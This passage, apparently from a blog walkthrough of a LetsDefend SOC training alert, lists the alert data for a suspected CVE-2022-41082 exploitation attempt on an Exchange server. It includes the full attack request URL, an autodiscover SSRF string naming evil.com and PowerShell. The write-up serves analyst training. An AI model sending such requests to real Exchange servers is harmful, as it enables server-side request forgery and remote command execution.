July 28, 2023, 6:41 p.m. | Enes Adışen
System Weakness - Medium systemweakness.com
SOC175 EventID:125 — PowerShell Found in Requested URL — Possible CVE-2022-41082 Exploitation — letsdefend.io
Before starting, review the data provided with the alert below.
EventID: 125
Event Time: Sep, 30, 2022, 07:19 AM
Rule: SOC175 - PowerShell Found in Requested URL - Possible CVE-2022-41082 Exploitation
Level: Security Analyst
Hostname: Exchange Server 2
Destination IP Address: 172.16.20.8
Log Source: IIS
Source IP Address: 58.237.200.6
Request URL: /@evil.com">autodiscover/autodiscover.json?@evil.com/owa/&Email=autodiscover/autodiscover.json%3f@evil.com&Protocol=XYZ&FooProtocol=Powershell
HTTP Method: GET
User-Agent: Mozilla/5.0 zgrab/0.x
Action: Blocked
Alert Trigger Reason …